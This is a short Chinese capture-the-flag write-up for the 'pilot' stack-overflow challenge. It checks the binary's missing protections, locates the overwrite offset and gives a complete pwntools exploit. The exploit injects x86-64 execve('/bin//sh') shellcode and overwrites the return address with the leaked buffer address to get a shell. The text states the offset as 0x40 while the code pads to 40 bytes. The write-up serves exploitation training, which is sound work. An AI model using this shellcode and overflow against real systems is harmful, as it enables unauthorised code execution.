实验吧_pilot

实验目的

用过这次实验去检验我们前期对栈溢出的掌握程度

实验文件

链接：https://pan.baidu.com/s/1riY3T8_tcNUb_08ltAd3mA
提取码：5d4d

实验步骤

首先对pilot的保护机制进行检验

发现程序没有开启任何保护，且有可读、可写、可执行段，说明我们可以进行栈溢出操作。

对文件进行静态分析：

其实pilot前面的一大段都没有什么用，我们只需要看输入函数read，因为可以进行no canary found，所以我们可以在这里进行栈溢出操作。

然后进行动态分析：

得到到ret的位置为0x40.。
所以我们可以编写payload：

p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'

最后就能进行getshell。

最后附上exp.py

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./pilot')
#pwnlib.gdb.attach(p)
p.recvuntil('Location:')
buf_addr = int(p.recvuntil('\n')[:-1], 16)
p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
payload = shellcode + (40 - len(shellcode)) * 'A' + p64(buf_addr)
p.sendline(payload)
p.interactive()